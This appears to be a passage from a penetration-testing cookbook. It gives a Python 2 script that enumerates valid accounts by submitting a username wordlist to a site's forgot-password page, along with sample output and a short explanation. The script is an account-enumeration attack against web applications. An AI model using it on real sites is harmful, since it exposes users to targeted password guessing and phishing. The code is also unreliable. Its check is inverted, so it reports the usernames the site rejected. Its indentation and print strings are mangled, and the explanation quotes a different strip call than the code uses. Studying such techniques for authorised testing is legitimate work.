For small but regular instances, a small tool that enables you to quickly check something will suffice. What about those bigger jobs? Maybe you've got a big haul from open source intelligence gathering and you want to see which of those users use an application you are targeting. This recipe will show you how to automate the process of checking for usernames that you have stored in a file.
Before you use this recipe, you will need to acquire a list of usernames to test. This can either be something you have created yourself, or you can use a word list found within Kali. If you need to create your own list, a good place to start would be to use common names that are likely to be found in a web application. These could include usernames such as user, admin, administrator, and so on.
This script will attempt to check usernames in a list provided to determine whether or not an account exists within the application:
#brute force username enumeration
import sys
import urllib
import urllib2
if len(sys.argv) !=2:
print "usage: %s filename" % (sys.argv[0])
sys.exit(0)
filename=str(sys.argv[1])
userlist = open(filename,'r')
url = "http://www.vulnerablesite.com/forgotpassword.html"
foundusers = []
UnknownStr="Username not found"
for user in userlist:
user=user.rstrip()
data = urllib.urlencode({"username":user})
request = urllib2.urlopen(url,data)
response = request.read()
if(response.find(UnknownStr)>=0):
foundusers.append(user)
request.close()
userlist.close()
if len(foundusers)>0:
print "Found Users:
"
for name in foundusers:
print name+"
"
else:
print "No users found
"The following is an example of the output of this script:
python bruteusernames.py userlist.txt Found Users: admin angela bob john
This script introduces a couple more concepts than basic username checking. The first of these is opening files in order to load our list:
userlist = open(filename,'r')
This opens the file containing our list of usernames and loads it into our userlist variable. We then loop through the list of users in the list. In this recipe, we also make use of the following line of code:
user=user.strip()
This command strips out whitespace, including newline characters, which can sometimes change the result of the encoding before being submitted.
If a username exists, then it is appended to a list. When all usernames have been checked, the contents of the list are output.